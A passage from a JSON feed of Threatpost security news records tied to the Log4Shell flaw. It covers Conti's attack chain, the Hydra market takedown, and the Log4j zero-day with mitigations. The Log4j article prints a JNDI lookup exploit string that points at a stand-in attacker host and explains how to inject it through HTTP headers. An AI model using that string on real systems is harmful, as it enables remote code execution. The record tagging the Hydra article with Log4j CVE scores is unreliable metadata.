"threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -&gt; Cobalt Strike -&gt; Human Exploitation -&gt; (no ADMIN$ share) -&gt; Kerberoast -&gt; vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named[ Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note[ lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s Atera Agent allows the gang to gain persistence on infected protected environments: especially those equipped with more aggressive machine learning endpoint detention and response anti-virus productions. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:57:25", "description": "German authorities have taken down the Hydra marketplace \u2013 a popular destination on the Dark Web for trading in illicit goods and services, including cyberattack tools and stolen data.\n\nThis week, they were able to commandeer and take offline underpinning infrastructure such as servers, plus install a takedown banner in place of a working website, all while seizing $25 million (\u20ac23 million) in funds in the process.\n\n\u201cThe illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,\u201d according to a [Tuesday statement](<https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2022/Presse2022/220405_PM_IllegalerDarknetMarktplatz.html>) from Frankfurt\u2019s public prosecutor (ZIT) and Germany\u2019s Federal Criminal Police Office (BKA). \u201cTheir focus was on trading in illegal narcotics. In addition, data spied out worldwide, forged documents and digital services were offered profitably via the platform.\u201d\n\nSecurity firm Elliptic said that it confirmed the seizure, which occurred on April 5 in a series of 88 transactions amounting to 543.3 BTC, according to [a post](<https://www.elliptic.co/blog/5-billion-darknet-market-hydra-seized-by-german-authorities>) about the Hydra crackdown on Tuesday. It also said that since its inception, Hydra has pulled in around $5 billion in Bitcoin.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/04/05135041/hydra-1-e1649181164284.png>)\n\nThe banner that site visitors now see. Source: BKA.\n\nThe takedown operation has been in motion since last August, according to the notice, and included cooperation from American authorities. The investigation found that Hydra had 17 million customer accounts and boasted more than 19,000 registered sellers, with a global turnover of $1.34 billion (\u20ac1.23 billion) just in 2020. alone. Finding that information was not easy, the agencies noted.\n\n\u201cIn particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto-investigations extremely difficult for law enforcement agencies,\u201d the posting noted. In the end they discovered that \u201cHydra\u2026was probably the illegal marketplace with the highest turnover worldwide.\u201d\n\nProsecutors are charging Hydra operators and administrators with charges of: commercially operating a criminal trading platform on the internet; the commercial procurement or granting of an opportunity for the unauthorized purchase or the unauthorized sale of narcotics; and commercial money laundering.\n\n## **Cracking Down on Illegal Dark Markets**\n\nGiven their status as linchpins of the [Dark Web underground economy](<https://threatpost.com/inside-ransomware-economy/166471/>) for cybercriminals and narcotics traders alike, international authorities have continued to put effort into dismantling underground markets.\n\nOne of the earliest wins was the [dismantling of Joker\u2019s Stash](<https://threatpost.com/jokers-stash-carding-site-taken-down/162548/>) in late 2020. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers. Anyone purchasing the information can create cloned cards to physically use at ATMs or at in-store machines that aren\u2019t chip-enabled; or, they can simply use the information to buy things online. Law enforcement managed to disable its blockchain DNS sites as well as Tor addresses.\n\nThen last year, Europol [announced the takedown](<https://threatpost.com/europol-dismantling-underground-marketplace/162949/>) of DarkMarket, which according to the law enforcement agency was \u201cthe world\u2019s largest illegal marketplace on the Dark Web.\u201d\n\nDarkMarket served as a marketplace for cybercriminals to buy and sell drugs, counterfeit money, stolen or counterfeit credit card data, anonymous SIM cards and malware. According to Europol, DarkMarket had almost 500,000 users and more than 2,400 sellers at the time of closure.\n\nIn addition, \u201cseveral darknet services have also voluntarily closed down over the winter of 2021-22,\u201d according Elliptic.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T17:53:47", "type": "threatpost", "title": "Authorities Fully Behead Hydra Dark Marketplace", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T17:53:47", "id": "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "href": "https://threatpost.com/authorities-hydra-dark-marketplace/179240/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug,\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploits as that spotted in Minecraft, as well as in cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes are [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. \u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but. well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Aka [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell ](<https://en.wikipedia.org/wiki/Shell_\\(computing\\)> \"Shell \\(computing\\)\" )present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n_\u201c_Organizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n``\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 &lt;= Apache log4j &lt;= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nVulnerability also depends on specific configurations. But there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings \u2013 CERT-NZ uses the example of \u201cJndi:ldap\u201d \u2013 they could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that a workaround released to address the flaw, which comes as part of Log4j version 2.15.0; reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting.,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to log4j-2.15.0-rc1.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [ discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>) regarding a mitigation strategy available in version 2.10.0 and higher of Log4j that was posted in the early hours of Friday morning.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)); or,\n * Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior; or\n * Users should switch log4j2.formatMsgNoLookups to true by adding:\u201d\u2010Dlog4j2.formatMsgNoLookups=True\u201d to the JVM command for starting the application.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nThe log4j vulnerability parses the input and reaches out to the malicious host via the JNDI. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are \u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": "https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an 